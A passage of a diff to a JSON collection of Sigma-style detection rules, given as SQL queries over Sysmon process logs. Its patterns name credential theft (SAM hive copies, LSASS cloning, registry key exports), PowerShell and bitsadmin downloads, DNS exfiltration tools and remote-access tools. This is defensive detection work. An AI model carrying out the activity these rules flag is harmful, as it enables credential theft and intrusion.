"proc_creation_win_renamed_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", + "title": "Suspicious Invoke-WebRequest Execution", + "id": 
"5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton (update fp)", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE 
'\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { "title": "Suspicious Child Process Created as System", 
@@ -6912,581 +6738,540 @@ "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", - "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - NirCmd Execution As LOCAL SYSTEM", + "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "status": "test", + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.005" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "title": "Renamed PAExec Execution", + "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of renamed version of PAExec. 
Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_renamed_paexec.yml" }, { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": 
"4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "Suspicious Windows App Activity", - "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", - "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. 
This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "status": "test", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "status": "test", - "description": "Detects the execution of a renamed binary often 
used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", - "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "title": "File With Suspicious Extension Downloaded Via Bitsadmin", + "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') 
AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "Winrar Compressing Dump 
Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Suspicious Add User to Remote Desktop Users Group", + "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "title": "Exports Critical Registry Keys To a File", + "id": 
"82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "description": "Detects the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", - "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Exfiltration and Tunneling Tools 
Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "status": "test", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR 
(CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", + "title": "Invoke-Obfuscation CLIP+ Launcher", + "id": "b222df08-0e07-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE 
'%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "title": "Renamed NetSupport RAT Execution", + "id": "0afbd410-de03-4078-8491-f132303cb67d", "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1176" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": 